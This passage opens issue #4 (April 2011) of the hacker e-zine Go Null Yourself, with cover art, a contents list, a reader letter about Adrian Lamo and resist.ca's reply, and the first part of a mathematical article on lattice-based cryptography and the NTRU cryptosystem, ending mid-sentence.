Go Null Yourself E-Zine #4

1. __
2. _,-;''';`'-,.
3. ,yNNNNNNNNo ,mMMMMMMMMd, _/', `; `; `\
4. -Mm oMd `NM: , _..,-'' ' ` ` `\
5. :Mm mM oMN mM: | ;._.,,-' .| |,_ ,, `\
6. .NMmmmmmmMM 'MMmmmmmNMN' -dh dd. | `;' ;' ;, `, ; | ' ' . \
7. :Mm MM. *purr* `; __` ,'__ ` , ` ; | ; \
8. dNNNNNNNNN, MM. yM :Mm MM. ; (6_); (6_) ; | , \ ' |
9. NM: :My MM. yM :Mm MM. ;; _,' ,. ` `, ' `-._ |
10. MM: :MN MM. yM :Mm MM. ,;.=..`_..=.,' -' ,'' _,--''
11. MM: :MM mMNmmmmmMM :Mm MM. _pb__\,`"=,,,=="',___,,,-----'''----'_'_'_''-;''
12. -----------------------'''''''''''''' hM) /'
13. .h+ sh :hdddddddh/ dd` :ds oddddddddy. ,ddddddd-d ,yddddddddo ,/ ,/'ddddddd`
14. -Mm+++++++oMM mMs:::::oMm MM. /Mh MM::::::hMh Mm+````` yMh`````yMM /' /Mh````````
15. /sssyMMssso- mM/ oMM MM. /Mh MM :+/ 'hhhhhhdM, yMh hh__,,-' /' MMNNNNNNNN.
16. .MM NMdyyyyydMN MMdyyyyymMh MM ,,,,,,,,MM sMN,/'_,,--''Mo My````````
17. `o+ `+ooooooo+` .+oooooooo: oo .oooooooo+: `/o| (ooooo /o- My
18. `' My
19. +:
20.  
21. 0x01 Introduction || 0x08 MapReduce, Part 2 elchupathingy
22. 0x02 Feedback + Edits || 0x09 Cameras + DVRs Scan storm
23. 0x03 Lattice-Based Cryptography rattle || 0x0a 303-833-00xx Scan Shadytel, Inc
24. 0x04 duper's Code Corner duper || 0x0b bit.ly Shenanigans Silks, elchupa
25. 0x05 The Tech Behind Credit Cards K141 || 0x0c Programming Challenge storm
26. 0x06 Brief Notes on Kiosk Hacking storm || 0x0d The Scoop on LIGATT
27. 0x07 Linux Rootkit Dev Update duper || 0x0e Et Cetera, Etc. teh crew
28.  
29. [==================================================================================================]
30.  
31. [================================================]
32.  
33. Go Null Yourself E-Zine
34. Issue #4 - Spring/April 2011
35.  
36. www.GoNullYourself.org
37.  
38. "It makes sense if you don't think about it"
39.  
40. [================================================]
41.  
42. [==================================================================================================]
43.  
44. -=[ 0x01 Introduction
45.  
46.  
47. Ahoy there, and welcome to issue #4 of GNY Zine - just in time for spring! The sun is shining, the
48. birds are chirping, and with the advent of laptops, now all you little h4xx0rs have no excuse not to
49. go outside! For those who still prefer the cool depths of a basement, though, then GNY Zine has all
50. you need in lieu of vitamin D and a social life. Like crypto! And rootkits! And leet ASCII art!
51. We may not have iced tea, but here's a recipe to make up for it:
52.  
53. * 8 cups water
54. * 3 orange pekoe tea bags
55. * 3/4 cup SPLENDA® No Calorie Sweetener, Granulated
56. * 1/2 cup lemon juice
57.  
58. 1. In a large saucepan, heat water to a rapid boil. Remove from heat and drop in the tea bags.
59. Cover and let steep for 1 hour.
60. 2. In a large pitcher, combine the steeped tea and the SPLENDA® Granulated Sweetener. Stir until
61. dissolved, then stir in lemon juice. Refrigerate until chilled.
62.  
63. Hey, it got quite a few good reviews and only has 11 Calories.
64.  
65. Anyways, don't want to keep you. Those 3100 lines below aren't gonna read themselves. Enjoy the
66. zine, and see ya in the summer.
67.  
68. Notable Events
69. ==============
70.  
71. January 2011 - Leak of LIGATT Security/Gregory D. Evans
72. January 31, 2011 - Go Null Yourself turns 3-years-old
73. February 3, 2011 - Exhaustion of remaining IPv4 address space
74. February 2011 - Leak of HBGary, Inc.
75.  
76. -=-=-
77.  
78. Now, on to formalities...
79.  
80. If you are interested in submitting content for future issues of GNY Zine, we would be happy to
81. review it for publication. Content may take many forms, whether it be a paper, review, scan, or
82. first-hand account of an event. Submissions of ASCII cover art that display the GNY logo in some
83. way are also appreciated. Well-received topics include computer hacking and exploitation methods,
84. programming, telephone phreaking (both analog and digital), system and network exploration, hardware
85. hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering.
86. We are also receptive to content relating to concrete subjects such as science and mathematics,
87. along with more abstract subjects such as psychology and culture. Both technical and non-technical
88. material is accepted.
89.  
90. Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent
91. via:
92.  
93. - IRC private message (storm, m0nkee, or Barney- @ irc.gonullyourself.org #gny)
94. - Email (zine@gonullyourself.org)
95.  
96. If there is enough feedback, we will publish some of the messages in future issues. Our PGP key is
97. available for use below.
98.  
99. We have devoted a lot of effort into this publication and hope that you learn something from reading
100. it. Abiding by our beliefs, any information within this e-zine may be freely re-distributed,
101. utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless
102. citing certain passages) and give credit to the original authors when and where necessary.
103.  
104. Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or
105. damage that may result from the information presented within this publication. Although people will
106. be people and act in idiotic fashions, we do not condone, promote, or participate in illegal
107. behavior in any way.
108.  
109.  
110. -----BEGIN PGP PUBLIC KEY BLOCK-----
111. Version: GnuPG v1.4.11 (GNU/Linux)
112.  
113. mQENBEzNnTIBCADCuSQtPeshJqqYd8KHfNoQ7ru3mWfwL3dc3MAgH1QYL1m1DSGs
114. 3rAeWqyN2Jv1LVz2qLFXsqCdQhEW2wZg2tPPgoGiKAXbWE2itIoPSa/M1jrms6ai
115. vwq2ySiWPi2F77Rlyuwqs2Acoj+AGm1JINejx7DcK8RLWDViw+f8DMHmDZI4SS+s
116. fE7kVKh0/mLE7TGBXL7rCNA2bOPEHah0nQw2X18v3UNMV6R31FWVAZgSuL/RI+sV
117. LOuKDANYuj36KxFlx2pDUwHDUcB+BMqxzmdosC98xu80fKuNVEsLz3HpUXTfdSLJ
118. 6F4gyKs1n2q7f6JcsdfoZ4nmj0IATnTK9tvfABEBAAG0HnN0b3JtIDxoaXhtb3N0
119. b3JtQGhvdG1haWwuY29tPokBPgQTAQIAKAUCTM2dhwIbIwUJCWYBgAYLCQgHAwIG
120. FQgCCQoLBBYCAwECHgECF4AACgkQ6oWhb3tw/4DtYgf9Ga/2HD5gP84qTZkh7aOx
121. PZQJJ3wJpZmQGw8kSvJLhtfBsvJJd8PuPay8aBmkVT+S+p0qUYjxc/BTD57t9O4+
122. Yh8DRk4gK+L9gvqR/RE/GxMEO+cyMXl0Nl8bTkV/qCygoctbTLPPJF37ZEFF0dp1
123. 1kWUSdTkJ7++gs7b0+YCX65oyyg8OpHVSmw9KUU90aHyfeu7MdgGrEGR+FNDn9uK
124. m9WamrOp82UKmb8wytXfnbG7z2XvgRynxazl7I4ErExtr6pbyPJCryrIGmlG/qzT
125. cabX6tHtRnVSgrB+BVWu+XpHRi1lns8QxXYvV4SBAZDEBDq6f1qMpHFxyzq7MNSP
126. t7Qfc3Rvcm0gPHppbmVAZ29udWxseW91cnNlbGYub3JnPokBPgQTAQIAKAUCTM2d
127. fAIbIwUJCWYBgAYLCQgHAwIGFQgCCQoLBBYCAwECHgECF4AACgkQ6oWhb3tw/4CW
128. Dgf/dr7c6POPiMPrf30J39UrlvaS3BFo66WgEY3wa24brtv24Y19Ehk8fmP78uS/
129. tkfdg+6Pu280ILechVjofDqjDHSyVSy+CSVp1TJpgYvPbIcEa4JQoscUEe4lGJGg
130. 1akXKu4RX1/o5wQrC/Tokm0NySxSPZfPhOnR5Bu1C6zvhneLVKpgLflfsCvlokxN
131. bo3TIAsfgqodkYR5CdyWGUYYQ9c4nbz0F6cSI2+k/mWFDljv4UQECl3MUcU2fNiC
132. a+1FAT6wmohVylYyyaA6YPVoe/9g5mKWQZyUq++bduLvV1qotpk7uJpKe3tgMJTn
133. /3tYZbhywejqTRRauGBSGv7QcrQgc3Rvcm0gPHN0b3JtQGdvbnVsbHlvdXJzZWxm
134. Lm9yZz6JAUEEEwECACsCGyMFCQlmAYAGCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheA
135. BQJMzZ2KAhkBAAoJEOqFoW97cP+AS24IALcjJUygQnHg2kdIuGCErQP511aqxwFO
136. CC5MEXRG+Mg7GLrtc6wy+D89ifWQldUR0UwK/S7MMQC2OhOJtdvjai7k8LfmeG1G
137. iJZ6XYY7WEzaQWiVPso1P5SVo41OT38EXL6t2Ic3yGVGKJ9Vpo25SEmEoC9EL2Xa
138. Blze0Z/6x5JUbK0yCY37vu2mYGLFpg7lCKQL24vg13OjNOMzeJFQssPCOeSCHkJv
139. L+u5E9ohdUmHwWXAJVUieIu/S6sFDH0GrxNp8/YLhA4I/APpSjBZ6tofkrXNyajQ
140. 9xjPT3KhuMErxRG+8a8iHhUH2VRibSdjwgJUxeg3DMqDQtxNFaRaFbqJAT4EEwEC
141. ACgFAkzNnTICGyMFCQlmAYAGCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEOqF
142. oW97cP+AMmcH/jrXI3Y+WVkC3XgaRC+CnInMNJSLnMpoX2hkKfJsIMiiH19O41+O
143. W0U7bE0gvRjlDpQYEKlSnNz4a+bGmmceAmy6Rr11QsOuhtZG3/AfkhFEQ4f3U3zt
144. 3miZILzcFc6vVXhXoq9stC6hoCzDPBu34s0OusHwxuVxX1eqCBSJYyrqSTlbxUKv
145. SYFfC/MzU6Q+iSZgiPNTYdgKIN3JKqZ2726i5IJOu6xIKNQByU4nEgV+Z4YjH7YD
146. MT9c6uSgqTACVM5h+3GW78G4Wl1E0lOXvimM/AEXHQSkZi34yq+JbOFspbyBhBz7
147. wRCIig4YSFDSwzPDdIx14NQlEq3+/tR9zx+5AQ0ETM2dMgEIALxlzgUfJ4leMnFF
148. gURwNGM5x9aTquU548xI4ESCeaDMkj6nHhrV4NAliBq28i48UjgI7IdE3pKYfQXi
149. aJZzQf4I+JULQkVzxF4uOjShhfXmhtABvBn+7du8qPqt5PwIFdb7ffmvXWFIX/in
150. +4QlDnlrz7xMQJBrBE9S4BJzR5IgWxpb7xA1yUWEJ+5vME3R+JhJuozmmmuMBHR1
151. s8pk8oEVrdmqdHeG5YZLsMyR5Kh6qJbPcj96CS9CtQU3HiEW0nwv8c3tNPY/4rNf
152. CAkeOWLAOvAq0Ybd82cIQr7Q0wVFo132H0Xs3Gw4MTiyvcd/BrGHeyjoBJfMhLCF
153. elFSEn0AEQEAAYkBJQQYAQIADwUCTM2dMgIbDAUJCWYBgAAKCRDqhaFve3D/gBq2
154. CACpH3rPcPb4HswNplVUMift+b5dV2ETYuNFXMK8yblFXa9URA6vdUzqrF9XSc6+
155. Tz9v/PVWY6FKKpnH06cbZQS07FWuY+zopsipuPgTaFLQyLlG2M+OoQOyEUYUpBW+
156. wTJ2Jd4hPiTlaoCLg2niA0RyzxzbnelrTtDtFtMoqJJlLWdtFoITW8/OLASHA7vu
157. bvRlfW89nueq9/4vEbxnvlUa7cOPtcZcGfHneHWV4JI9e5NJ6Agxp1gOkouF9/jn
158. YneawjaEgI6QOS06yyTXOu/XCo6L+f4/wd+1EMzt+NjsUXSraeNw+tdjZEZ8Uo9/
159. 8QJQ4gF00KrsCCSrPyg/cZ5G
160. =g7oJ
161. -----END PGP PUBLIC KEY BLOCK-----
162.  
163.  
164. [==================================================================================================]
165.  
166. -=[ 0x02 Feedback and Edits
167.  
168.  
169. We always strive to publish accurate information in GNY Zine, but we the authors and editors are in
170. fact human beings and are subject to making mistakes from time to time, despite our best efforts.
171. The publication, compilation, and distribution of this e-zine is derived entirely from our passion
172. for technology and curiosity of how things tick. GNY Zine has no commercial influences. If you
173. find that there is an error in content that we have published, please do not hesitate to email us so
174. that it may be announced and corrected in the next issue. Not acting like a stuck-up elitist about
175. it will probably invoke a more positive response too.
176.  
177. With that being said, we are also receptive to content or personal experiences relevant to
178. information presented in past issues. If you've written some code, applied a concept in a new way,
179. or just want to voice your opinion about a topic, send us an email!
180.  
181. We may be contacted at: zine@gonullyourself.org
182. (PGP key is available in the Introduction)
183.  
184. Please note that emails we like will be published in future issues, so specify if you wish for your
185. message to remain private or if you wish for us to redact certain personal information from it.
186.  
187. ----------------------------------------------------------------------------------------------------
188.  
189. Turning Manning into the Feds turns an institution with relatively
190. unlimited power against Manning. The techniques used by Lamo were a
191. betrayal of trust given (arguably without having been earned) to Lamo.
192. Lamo is a snitch by definition. The fact that he still has hosting
193. on domains like resist.ca, is further evidence that resist.ca can not
194. be trusted as an anarchist resource.
195.  
196. The panel at HOPE in which Lamo was confronted framed the hacker
197. community as one that is filled with snitches. Members of the panel
198. told stories about how they were turned in by people they collaborated
199. with and trusted. Behavior like this closes doors to the flow of
200. information, welcomes the violence of authoritarian institutions, and
201. sets the foundation for the privatization of security research.
202. Behavior like Lamo's is in opposition to the safety and values of the
203. hacker community, and as a result should not be allowed space.
204. Idolizing individuals who act with such a disregard for the hacker
205. community they claim to be a part of with a glowing expose is a
206. disgrace to the hacker community.
207.  
208. With disgust,
209. evoltech
210.  
211. >> Thanks for sending us your opinion. Though, we checked and it seems like Adrian's website is
212. >> currently 404'ing (for those of you who didn't read the interview from issue #2, the URL is
213. >> http://users.resist.ca/~adrian/). We actually followed up on this and contacted resist.ca about
214. >> it, who replied:
215.  
216. Hi there,
217.  
218. Sorry we haven't responded to you yet about your question about Adrian Lamo's website on resist.ca.
219. We removed his various accounts becuase his motivations seem to be in conflict with ours (see
220. http://www.youtube.com/watch?v=ebLahUUr__s). Our project is politically motivated and we offer
221. services to projects that share our political alignment. Adrian's activities around the wikileaks
222. debacle suggest to us that he doesn't actually align with us politically.
223.  
224. For more information on the kinds of political activism we support, please read our mission
225. statement at http://resist.ca/mission and our basis of unity at http://resist.ca/basis
226.  
227. --The resist.ca collective
228.  
229. >> So, there you go.
230.  
231.  
232. [==================================================================================================]
233.  
234.  
235. -=[ 0x03 Lattice-Based Cryptography
236. -=[ Author: rattle
237.  
238. -=[ Website: http://www.awarenetwork.org/
239.  
240.  
241. p o s t - q u a n t u m
242. ,----,----,--,--,-----.|¯¯|_.-----.-----.----.---.-.-----.|¯¯|--.--.--.
243. | __| _| | | = || _| = | = | _| = | = || | | |
244. |____|__| |___ | __||____|_____|___ |__| |___._| __||__|__|___ |
245. |_____|__| |_____| |__| |_____|
246. A Lattice-Based Crypto System
247. rattle // born // tobi
248.  
249. -- 0 Requirements --------------------------------------------------------------
250.  
251. I will expect readers to have a basic grasp of (linear) algebra. The terms I
252. will use without further explanation are the following:
253. - vector
254. - linear independence
255. - matrix
256. - rank of a matrix
257. - transpose of a matrix
258. - scalar products
259. - quotient rings Z(q) = { 0, ..., q-1 }
260. (where all operations are performed modulo q)
261.  
262. I also expect the reader to have a certain idea of computational complexity, if
263. even only the roughest. You should have heard of the following notions:
264. - Big-O notation (Landau symbols)
265. - Time/Space complexity of an algorithm
266.  
267. I really can not give a complete introduction to these topics here. I would
268. recommend literature, but all the undergraduate books on these topics that I
269. know are in German.
270.  
271.  
272. ---- 0.1 Notation --------------------------------------------------------------
273.  
274. When A is some (n x m)-matrix (this means it has n rows and m columns), then
275. the entry in the i-th row and j-th column is denoted by A[i,j]. Similarly,
276. if a is a vector (which is just a (n x 1)-matrix), we will denote the i-th
277. entry of this vector by a[i]. The transpose of a matrix A is denoted by A°.
278. The canonical basis of real space will be denoted by e(1)...e(n), which are
279. the vectors defined by e(i)[j]=1 <=> i=j and e(i)[j]=0 otherwise.
280.  
281. We will denote the real numbers by R, the integer numbers by Z. The notation
282. X^n is to be read as "X to the n" and denotes Cartesian powers if X is a set,
283. otherwise it means multiplying X with itself n times, duh. In real space, if
284. a and b are vectors, we denote by
285.  
286. <a,b> = a[1]·b[1] + ··· + a[n]·b[n]
287.  
288. the Euclidean scalar product.
289.  
290.  
291. -- 1 Introduction --------------------------------------------------------------
292.  
293. Given linearly independent vectors B[1],...,B[n] in R^n, the lattice spanned
294. by these vectors is the set
295.  
296. L = { a[1]·B[1] + ... + a[n]·B[n] | a in Z^n }
297.  
298. of all integer linear combinations of them. The following is an example in R^2:
299. Each lattice point is marked by an x and the 'grid' has been ASCII-modelled
300. for your convenience.
301.  
302. ^
303. |· · ·. · · ·. · ·
304. 7 x · x · x ·
305. | ·. · · ·. · · ·. ·
306. 6 | x · x · x
307. | · ·. · · ·. · · ·
308. 5 | · x · x ·
309. | ·. · · ·. · · ·. ·
310. 4 | x · x · x
311. | · ·. · · ·. · · ·.
312. 3 | · x · x ·
313. | · · ·. · · ·. ·
314. 2 | x · x · x
315. | · ·. · · ·. · · ·. ·
316. 1 | · x · x · x
317. |· · ·. · · ·. · ·
318. --+---------------------------x---------------------------x----------------->
319. | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
320. |
321. Figure 1: Example of a two-dimensional Lattice
322.  
323. Now, consider the following picture. We have added a "target" vector (marked €)
324. and a circle around it intersecting the closest lattice point, which is p=(5,3)
325. in this case.
326.  
327. ^
328. |· · ·. · · ·. · ·
329. 7 x · x · x ·
330. | ·. · · ·. · · ·. ·
331. 6 | x · x · x
332. | · ·. · · ·. · · ·
333. 5 | · x · x ·
334. | ·. · _·_ ·. · · ·. ·
335. 4 | x Ž · ` x · x
336. | · ·. | · € | · ·. · · ·.
337. 3 | · p , · x ·
338. | · · ¯ ¯ ·. · · ·. ·
339. 2 | b · x · x
340. | · ·. · · ·. · · ·. ·
341. 1 | · a · x · c
342. |· · ·. · · ·. · ·
343. --+---------------------------d---------------------------x----------------->
344. | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
345. |
346. Figure 2: Lattice with target vector
347.  
348. Using the basis a=(4,1) and b=(1,2), it is easy to see that p = a + b. On the
349. other hand, using the basis c=(18,1) and d=(7,0), the same point has the less
350. simple description p = 3·c - 7·d. When passing to higher dimensions, this
351. phenomenon escalates drastically. This way, we obtain a computational problem
352. that varies from easy to virtually impossible to solve, depending very much on
353. on the lattice basis used.
354.  
355.  
356. ---- 1.1 Lattice Problems ------------------------------------------------------
357.  
358. Let L be a lattice and g some real value greater or equal to one. We denote by
359. d(x,y) the distance from the point x to the point y. The lattice approximation
360. problems are the following:
361.  
362. CLOSEST VECTOR PROBLEM -- CVP(g):
363. For any vector t in R^n, let y be the lattice point closest to t. The task is
364. to find a lattice point x not equal to t such that d(x,t) is less or equal to
365. g·d(y,t). In other words, x is no further from t than g times the distance
366. from t to any lattice point.
367.  
368. SHORTEST VECTOR PROBLEM -- SVP(g):
369. Find a vector x such that x is no longer than g times the shortest lattice
370. vector. This is the special case of the CVP where t=(0,...,0) is the origin.
371.  
372. We also write SVP = SVP(1) and CVP = CVP(1) for the non-approximative problems.
373.  
374.  
375. ---- 1.2 Lattice-based Encryption: Breakdown -----------------------------------
376.  
377. Based on these problems, we can build an assymetrical cryptosystem, which is
378. roughly described as follows:
379. a) Choose a random "good" basis and keep it as a private key.
380. b) Hand out a "bad" basis for the same lattice as a public key.
381. c) Somehow find a way to encode your messages as lattice points.
382. d) Encrypt a lattice point by simply distorting it randomly by a small vector.
383. e) Decryption now means that you have to find the lattice point closest to the
384. distorted vector (because it was the original message). This is now
385. equivalent to solving the CVP, which should only be possible when in
386. possession of a "good" basis.
387.  
388.  
389. ---- 1.3 Analysis of SVP -------------------------------------------------------
390.  
391. We now give a brief historical analysis of the hardness of the SVP(g) - one
392. should note here that the CVP(g) is harder than the SVP(g), therefore it would
393. suffice if the SVP(g) was hard to solve. And indeed, from the algorithms known
394. so far, it seems that we can either achieve a polynomial runtime or a
395. polynomial approximation factor, but not both:
396.  
397. +--------+--------------+--------+-------------------------------------+
398. | g | Runtime | Space | Reference |
399. +--------+--------------+--------+-------------------------------------+
400. | 1 | 2^O(n) | 2^O(n) | [JHLW11, Combinatorial SVP-Solver] |
401. | 1 | 2^O(n log n) | poly | [Kan83] |
402. | poly | 2^O(n) | 2^O(n) | [MR09] |
403. | 2^O(n) | poly | ? | [LLL82] |
404. +--------+--------------+--------+-------------------------------------+
405.  
406. This has led to the following conjecture:
407.  
408. Conjecture 1.1. There is no polynomial time algorithm that approximates
409. lattice problems to within polynomial factors.
410.  
411. As far as exponential-time exact solvers are concerned, they have become
412. practical even for small instances just in the recent years:
413.  
414. +------+-------------------------+----------+-----------+
415. | Year | Authors | Time | Space |
416. +------+-------------------------+----------+-----------+
417. | 2001 | Ajtai, Kumar, Sivakumar | 2^O(n) | 2^O(n) |
418. | 2004 | Regev | 2^(16n) | 2^(8n) |
419. | 2008 | Nguyen, Vidick | 2^(5.9n) | 2^(3n) |
420. | 2010 | Pujol, Stelhé | 2^(2.5n) | 2^(1.2n) |
421. +------+-------------------------+----------+-----------+
422.  
423. One should note, however, that lattice reduction methods such as [LLL82] seem to
424. perform better in practice than their theoretic worst-case guarantees suggest.
425. This is not fully explained yet, but has experimental evidence: In [GN08],
426. different algorithms and several distributions on lattices were compared with
427. the result that they provide an approximation ratio of roughly g=d^n where d is
428. close to 1.012. Still, it seems that approximation rations of (1.01)^n are
429. outside the reach of known lattice reduction algorithms. We should note that
430. for __________
431. / n
432. g > / --------
433. ¯\/ log(n)
434.  
435. the SVP(g) is not NP-hard unless the polynomial time hierarchy collapses (you
436. should read this as "is not NP-hard"). However, it was shown in [Ajt98] that the
437. SVP=SVP(1) actually is NP-hard. Furthermore, there are no quantum algorithms
438. known that perform better than the classical ones. Because of this, lattice-
439. based cryptography is often labelled "post-quantum" cryptography. In summary, we
440. may very well assume that the SVP is a hard problem.
441.  
442.  
443. -- 2 NTRU ----------------------------------------------------------------------
444.  
445. We will now present a practical implementation of the rough idea presented in
446. subsection 1.2. For the mathematically inclined, a detailed explanation of why
447. the encryption scheme really works the way we outlined in 1.2 can be found in
448. [JHLW11].
449.  
450.  
451. ---- 2.1 Mathematical Necessities ----------------------------------------------
452.  
453. We first require a couple of mathematical definitions and results, since NTRU
454. operates on a very special kind of lattices.
455.  
456. Definition 2.1. Let Z(q) = {0,...,q-1} be the integer numbers from 0 to q-1,
457. with all operations performed modulo q. We denote by p: Z --> Z(q) the map that
458. sends any number n to (n mod q). When A is a matrix with integer entries, we
459. denote by p(A) the matrix with entries in Z(q) which is obtained by reducing all
460. entries modulo q.
461.  
462. Definition 2.2. Let v in R^n be a vector an A an (n x n)-matrix. We then define
463. the matrix
464. / \
465. | v[0] (A·v)[0] ··· (A^(n-1)·v)[0] |
466. | · · · |
467. (A*v) := | · · · |
468. | · · · |
469. | v[n] (A·v)[n] ··· (A^(n-1)·v)[n] |
470. \ /
471.  
472. whose i-th column is the result of applying A exactly (i-1) times to v. We also
473. define the special (n x n)-matrix
474.  
475. / | \
476. | 0 · · · 0 | 1 |
477. | ---------------+--- |
478. | 1 0 · · 0 | 0 |
479. T := | 0 · · | · |
480. | · · · | · |
481. | · · 0 | · |
482. | 0 · · 0 1 | 0 |
483. \ | /
484.  
485. and will make frequent use of the matrix (T*v), which is the matrix whose i-th
486. column is just v, rotated by i.
487.  
488. Lemma 2.3. For any two vectors f and g,
489. 1) (T*f)·g = (T*g)·f
490. 2) T·(T*f) = (T*f)·T
491. 3) (T*f)·(T*g) = (T*((T*f)·g))
492.  
493. Proof. Consider the (k x k)-matrices
494.  
495. / \
496. | 0 · · 0 1 |
497. | · · 0 |
498. I(k) := | · · · |
499. | 0 · · |
500. | 1 0 · · 0 |
501. \ /
502.  
503. and the symmetrical (n x n)-matrices
504.  
505. / | \
506. | I(k) | 0 |
507. S(k) := | ------+-------- |
508. | 0 | I(n-k) |
509. \ | /
510.  
511. Then, we have
512.  
513. / \ / \ / \
514. | g[1] g[n] ·· g[2] | | <f,S(1)·g> | | <S(1)·f,g> |
515. | g[2] g[1] ·· g[3] | | <f,S(2)·g> | | <S(2)·f,g> |
516. (T*g)·f = | · · · | · f = | · | = | · | =: h
517. | · · · | | · | | · |
518. | g[n] g[n-1] ·· g[1] | | <f,S(n)·g> | | <S(n)·f,g> |
519. \ / \ / \ /
520.  
521. And clearly, (T*f)·g = h. This proves part (1) already. For the second state-
522. ment, we calculate (all index operations are performed modulo n):
523.  
524. __ n
525. <S(i-1)·f,(T^j)·g> = > (S(i-1)·f)[k] · ((T^j)·g)[k]
526. ¯¯ k=1
527. __ i-1 __ n
528. = > f[i-k]·g[k-j] + > f[n+i-k]·g[k-j]
529. ¯¯ k=1 ¯¯ k=i
530.  
531. __ i __ n+1
532. = > f[i-k+1]·g[k-j-1] + > f[n+i-k+1]·g[k-j-1]
533. ¯¯ k=2 ¯¯ k=i+1
534.  
535. __ i __ n
536. = > f[i-k+1]·g[k-j-1] + > f[n+i-k+1]·g[k-j-1]
537. ¯¯ k=1 ¯¯ k=i+1
538.  
539. = <S(i)·f,T^(j+1)·g>
540.  
541. which yields
542.  
543. / \ / \ / \
544. | <S(1)·f,T^(j-1)·g> | | <S(n)·f,T^(j-1)·g> | | <S(1)·f,(T^j)·g> |
545. | <S(2)·f,T^(j-1)·g> | | <S(1)·f,T^(j-1)·g> | | <S(2)·f,(T^j)·g> |
546. T · | · | = | · | = | · |
547. | · | | · | | · |
548. | <S(n)·f,T^(j-1)·g> | | <S(n-1)·f,T^(j-1)·g> | | <S(n)·f,(T^j)·g> |
549. \ / \ / \ /
550.  
551. and therefore,
552.  
553. / \
554. | <S(1)·f,T^(j-1)·g> |
555. T^(j-1) · h = (T*h)_j = | ... |.
556. | <S(n)·f,T^(j-1)·g> |
557. \ /
558.  
559. With this, it is now obvious that
560.  
561. / \ / \
562. | f[1] f[n] · · f[2] | | g[1] g[n] · · g[2] |
563. | f[2] f[1] · · f[3] | | g[2] g[1] · · g[3] |
564. (T*f)·(T*g) = | · · · | · | · · · | = (T*h).
565. | · · · | | · · · |
566. | f[n] f[n-1] · · f[1] | | g[n] g[n-1] · · g[1] |
567. \ / \ / q.e.d.
568.  
569. Definition 2.4. Let n and d be positive integer numbers and d < n. A vector f in
570. Z^n is called a d-vector if it has exactly d negative and d+1 positive entries.
571.  
572.  
573. ---- 2.2 The NTRU Cryptosystem -------------------------------------------------
574.  
575. We can now describe the process of key generation for the NTRU cryptosystem:
576.  
577. ________________________________________________________________________________
578. Algorithm 1: NTRU-KEY-GENERATION
579. ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
580. Input: A prime number n, a "modulus" q, a "weight bound" d and an integer p<q.
581. Output: A private key (f,g) in Z^(2n) and a public key h in Z(q)^n.
582. ________________________________________________________________________________
583. 1: CHOOSE two d-vectors f' and g in {p,0,-p}^n randomly
584. 2: SET f := f' + e(1)
585. 3: IF p(T*f) is not invertible THEN
586. 4: GOTO 1
587. 5: SET h := (T*f)^(-1) · g
588. 6: SET h := h mod q
589. 7: RETURN (f,g) and h
590. ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
591.  
592. The number q is called the modulus because we operate modulo q, the reason why
593. we call d the "weight bound" will become apparent later. From the choice of the
594. vectors f and g in the algorithm, we immediately obtain the following result:
595.  
596. Proposition 2.4. Let (f,g) and h be a key pair generated by Algorithm 1. Then,
597. (T*f) mod p = I and (T*g) mod p = 0.
598.  
599. Let us now take a look at the encryption and decryption routines:
600.  
601. ________________________________________________________________________________
602. Algorithm 2: NTRU-ENCRYPTION
603. ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
604. Input: A prime number n, a modulus q, a weight bound d, a public key h, and a
605. d-vector m in {1,0,-1}^n encoding the message.
606. Output: A ciphertext c in Z(q)^n.
607. ________________________________________________________________________________
608. 1: CHOOSE a d-vector r in {1,0,-1}^n randomly
609. 2: RETURN m + (T*h)·r
610. ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
611.  
612. This encryption routine works exactly as step d) in 1.2: We choose a random
613. "distortion" vector r and distort the message by (T*h)·r. The result is our
614. ciphertext.
615.  
616. ________________________________________________________________________________
617. Algorithm 3: NTRU-DECRYPTION
618. ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
619. Input: A prime number n, a modulus q, a weight bound d, an integer p < q,
620. a private key (f,g) in Z(q)^n and a ciphertext c in Z(q)^n.
621. Output: The plaintext message m in {1,0,-1}^n
622. ________________________________________________________________________________
623. 1: SET v := (T*f)·c
624. 2: FOR i=1 TO n DO
625. 3: CHOOSE t such that p(t)=w[i] and |t| is minimal
626. 4: SET v[i] := t mod p
627. 5: RETURN v
628. ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
629.  
630. It is not yet clear why the decryption routine actually recovers the plaintext
